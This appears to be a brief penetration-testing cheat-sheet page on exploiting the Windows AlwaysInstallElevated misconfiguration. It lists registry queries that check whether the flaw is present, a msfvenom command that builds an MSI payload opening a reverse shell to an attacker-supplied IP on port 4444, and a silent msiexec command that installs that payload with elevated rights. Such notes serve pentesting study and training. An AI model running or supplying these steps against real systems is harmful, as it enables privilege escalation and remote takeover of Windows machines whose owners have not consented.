AlwaysInstallElevated

check if vulnerable -> looking for both command respond with 0x1

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your-ip> LPORT=4444 -f msi -o exploit.msi


msiexec /i C:\path\to\exploit.msi /quiet

PreviousInsecure File/Folder Permissions NextAutoruns

Last updated 7 months ago